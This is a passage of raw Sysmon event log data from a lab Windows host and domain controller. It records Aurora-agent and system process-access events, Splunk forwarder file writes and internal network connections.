10341000x800000000000000018478Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.675{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018477Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.664{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018476Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.653{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018475Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.623{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018474Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.616{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018473Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.607{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018472Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.590{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018471Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.581{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018470Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.567{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018469Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.562{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018468Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.554{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 23542300x800000000000000046240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:23.686{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5924174D63F7EA30C46C0C13FAB8EA9B,SHA256=1F64EA5C04AABC3EDBB5AF1DCB2E2DEE66B9CE63F0D69585056A633EF43B4D4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018499Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:23.205{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=151F1FC27937910381270E85068A6585,SHA256=7041CC919D9E439A85CBFBBCD089B3CF73077B9C542CEC8FCDF1B012B9ECFBC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:24.788{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6A7AC6198D9BA578FF375D0EE0F8FFA,SHA256=4B70896293036F3525D48DCFF9D31C63A3477C0A846FC3991495621E1E310BF8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018501Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.946{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50183-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018500Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:24.313{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C21EFCF4203114F03BE6E557BD07CCE,SHA256=D866843777020B80C1A08B2CA97DC93C9B642E20B6CF190CC6BDF988E8F58A02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:25.852{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA0189FA26C7CD79B34333C56E2AFBAC,SHA256=61AB5B5F4105267AAF6F342BA1333DC504F889AA3E43412DF0FF5BCD3BAE4927,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018506Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:25.672{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018505Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:25.672{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018504Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:25.672{E5A8D418-DC43-63C7-0B00-00000000B002}6323836C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018503Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:25.659{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018502Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:25.382{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27472AC65C214708DAF33A113F5831B3,SHA256=D8494CE248C02F8928620A2D458D467D01A320AD63E3CFF30C7ECC993871639C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000046242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:22.672{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56459-false10.0.1.12-8000- 23542300x800000000000000046245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:26.946{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6266A492B6676F28A99795089DAFDEC6,SHA256=8A9D0B21F147162162286A79DB09DA9918424CCC9E9858DE2A5B7E55B9E55566,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018507Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:26.474{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A037D46C1CAC2AB10776ACCDB0C7282C,SHA256=9A657042C093BBE32180BCD7E62A649CE957A9838C323D41F31BD730084F873B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:26.617{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=228EABCC3BACE9BE8E7D88A3A7E282FE,SHA256=51728C3BF64D3DBCF8C01755FF744B4F39DC671B344F0C7F7EA94177E9B0E338,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018508Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:27.546{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F690BEB49E76CC6AED43D7031366252A,SHA256=CA42995F7EAD446746034E6A1DFBB55A3A911DE46AF60FC7F301E0D9B2DCFAFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:27.776{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018509Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:28.611{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D902620AD4D83DCF9E31701215B7A29F,SHA256=2C29B140122288DCBFF6E34E09C5115F9592EC666FE4A16572A4F86297A5E5C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:28.988{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E628-63C7-8006-00000000AF02}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:28.988{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:28.988{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:28.988{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:28.988{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:28.988{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E628-63C7-8006-00000000AF02}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:28.988{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E628-63C7-8006-00000000AF02}6872C:\Program 